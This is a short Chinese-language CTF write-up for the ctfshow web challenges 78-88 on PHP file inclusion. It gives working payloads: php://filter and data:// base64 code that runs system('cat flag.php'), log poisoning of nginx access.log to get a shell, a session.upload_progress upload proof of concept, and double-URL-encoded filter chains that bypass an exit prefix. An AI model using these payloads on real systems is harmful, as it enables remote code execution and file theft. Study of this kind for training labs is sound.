ctfshow web入门 78-88的文件包含
1. web78
PHP伪协议读取
?file=php://filter/convert.base64-encode/resource=flag.php
2. web79
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');
然后查看源代码
3. web80-81
包含日志文件 进行getshell
日志文件路径:?file=/var/log/nginx/access.log
4. web82-86
利用session.upload_progress进行文件包含
这道题有点像wmctf的make php great again
利用session对话进行文件包含利用
#poc.php
<!DOCTYPE html>
<html>
<body>
<form action="ip地址" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
5. web87
https://www.leavesongs.com/PENETRATION/php-filter-magic.html
php://filter/write=string.rot13/resource=2.php
原因可能是因为php版本太高了这个过滤器不让用了
使用base64绕过
php://filter/write=convert.base64-decode/resource=3.php
通过url双编码
%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%33%25%32%65%25%37%30%25%36%38%25%37%30
因为通过base64过滤之后就只有(phpdie)6个字符我们就要添加2个字符让前面的可以进行编码
6. web88
发现过滤的还是比较多,但是没有过滤:那我们就可以使用PHP伪协议就是
这里使用的是data://text/plain;base64,poc 其实和79差不多
只是注意的是编码成base64的时候要去掉=
base64的内容是 <?php system('cat fl0g.php'); ?>
下一篇: 深入理解Shell输出颜色与控制